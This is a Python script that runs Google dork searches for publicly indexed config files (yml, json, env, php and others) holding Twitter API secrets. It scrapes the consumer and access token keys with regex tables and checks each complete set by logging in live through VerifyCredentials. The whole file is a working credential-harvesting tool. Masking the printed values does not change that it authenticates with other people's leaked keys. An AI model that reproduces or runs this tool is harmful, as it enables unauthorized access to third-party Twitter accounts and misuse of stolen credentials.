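#!/usr/bin/env python3
# pip install python-twitter
# pip install colored
# pip install google
"""Find Twitter API credentials exposed in publicly indexed config files.

Builds Google queries for common config file types, downloads each result,
extracts the four credential values (consumer key/secret, access token
key/secret) with the pattern tables below, and asks the Twitter API whether
a complete set is still accepted.

Values are masked when printed, so terminal scrollback and captured logs do
not become a second copy of the leaked secret.
"""

import re
import urllib3  # not referenced in this listing any more; left for code outside it
import twitter
import requests
import colored
import googlesearch

# File types and key names that are combined into the search queries.
dork_extensions = ['yml', 'yaml', 'json', 'env', 'ini', 'cnf', 'php', 'txt']
dork_queries = [
    'CONSUMER_SECRET',
    'TOKEN_SECRET',
    'OAUTH_TOKEN_SECRET',
    'ACCESS_TOKEN_SECRET'
]

# One query per (extension, key name) pair, in extension-major order.
dorks = [
    'filetype:' + extension + ' "twitter" "' + query + '"'
    for extension in dork_extensions
    for query in dork_queries
]

# Each table below is an ordered list of
#   (compiled pattern, capture-group index returned by regex_ordered_array_search)
# All patterns are case-insensitive and multi-line.
regex_twitter_consumer_key = [
    (re.compile(r'''(TWITTER_)?CONSUMER(_KEY)?("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 6),
    (re.compile(r'TWITTER_CONSUMER(_KEY)?=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
    (re.compile(r'''TWITTER_CONSUMER(_KEY)?("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
    (re.compile(r'''TWITTER_CONSUMER(_KEY)?("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]

regex_twitter_access_token_key = [
    (re.compile(r'''((TWITTER_)?ACCESS_TOKEN(_KEY)?|(TWITTER_)?oauth_token)("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 8),
    (re.compile(r'(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 3),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN(_KEY)?|twitter_oauth_token)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 5)
]

regex_twitter_consumer_secret = [
    (re.compile(r'''(TWITTER_)?CONSUMER_SECRET("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 5),
    (re.compile(r'(TWITTER_CONSUMER_SECRET)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
    (re.compile(r'''(TWITTER_CONSUMER_SECRET)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 5),
    (re.compile(r'''(TWITTER_CONSUMER_SECRET)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]

regex_twitter_access_token_secret = [
    (re.compile(r'''((TWITTER_)?ACCESS(_TOKEN)?_SECRET|(TWITTER_)?TOKEN_SECRET|(TWITTER_)?oauth_token_secret)("|')? *?(=|:|,) *("|')?([^\$<>\n"'{}\(\);,\[\]_=+&?|]*)("|')?(;|}|\))*?''', re.MULTILINE | re.IGNORECASE), 9),
    (re.compile(r'(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)=([^<>\n]*)$', re.MULTILINE | re.IGNORECASE), 2),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)("|')? ?, ?("|')([^<>\n]*?)("|')''', re.MULTILINE | re.IGNORECASE), 4),
    (re.compile(r'''(TWITTER_ACCESS_TOKEN_SECRET|TWITTER_TOKEN_SECRET|twitter_oauth_token_secret)("|')? ?= ?("|')(.*?)("|');$''', re.MULTILINE | re.IGNORECASE), 4)
]


def regex_ordered_array_search(regexs, content):
    """Return the first non-empty capture produced by an ordered pattern table.

    Args:
        regexs: sequence of ``(compiled_pattern, group_index)`` pairs, tried
            in the order given.
        content: text to search.

    Returns:
        The text of ``group_index`` from the first entry whose match yields a
        non-empty value, or ``None`` when no entry does.
    """
    for pattern, group_index in regexs:
        try:
            match = pattern.search(content)
            value = match.group(group_index) if match else None
        except (IndexError, TypeError):
            # Unknown group index or non-text content counts as "no match".
            continue
        if value:
            return value
    return None


def _mask_secret(value, visible=4):
    """Return *value* with everything after the first *visible* characters starred out."""
    if len(value) <= visible:
        return '*' * len(value)
    return value[:visible] + '*' * (len(value) - visible)


# URLs already fetched; the same file can be returned for several queries.
parsed = set()

for dork in dorks:
    print('------------------------------')
    print('Trying dork: ' + dork)

    for url in googlesearch.search(dork, num=10, stop=None, pause=2):
        if url in parsed:
            continue
        parsed.add(url)

        try:
            # Certificate verification is left at the requests default (on),
            # so a host that cannot present a valid certificate is skipped
            # instead of having its response trusted.
            response = requests.get(url, timeout=5)
            content = response.content.decode('utf-8')
        except Exception:
            # Best-effort crawl: unreachable hosts, TLS failures and bodies
            # that are not UTF-8 are skipped rather than aborting the run.
            continue

        twitter_consumer_key = regex_ordered_array_search(regex_twitter_consumer_key, content)
        twitter_consumer_secret = regex_ordered_array_search(regex_twitter_consumer_secret, content)
        twitter_access_token_key = regex_ordered_array_search(regex_twitter_access_token_key, content)
        twitter_access_token_secret = regex_ordered_array_search(regex_twitter_access_token_secret, content)

        # Only a complete set of four values is reported and checked.
        if not (twitter_consumer_key and twitter_consumer_secret
                and twitter_access_token_key and twitter_access_token_secret):
            continue

        print('------------------------------')
        print('{}{}{}'.format(colored.attr(1), url, colored.attr(0)))
        print('\tConsumer Key: ' + _mask_secret(twitter_consumer_key))
        print('\tConsumer Secret: ' + _mask_secret(twitter_consumer_secret))
        print('\tAccess Token Key: ' + _mask_secret(twitter_access_token_key))
        print('\tAccess Token Secret: ' + _mask_secret(twitter_access_token_secret))

        # The client is built from the unmasked values; VerifyCredentials()
        # is a live, authenticated API call made with them.
        api = twitter.Api(
            consumer_key=twitter_consumer_key,
            consumer_secret=twitter_consumer_secret,
            access_token_key=twitter_access_token_key,
            access_token_secret=twitter_access_token_secret
        )

        # Both lines are joined with format() rather than %-interpolated into
        # a template that contains the remote text: an error message holding
        # a literal '%' would otherwise raise inside the handler and stop the
        # whole run.
        try:
            identity = api.VerifyCredentials()
            # NOTE(review): created_at on the returned user looks like the
            # account creation time, not the last tweet - confirm the label.
            line = '\tName: @' + identity.screen_name + ', Last Tweet: ' + identity.created_at
            print('{}{}{}'.format(colored.fg(2), line, colored.attr(0)))
        except Exception as e:
            print('{}{}{}'.format(colored.fg(1), '\tError: ' + str(e), colored.attr(0)))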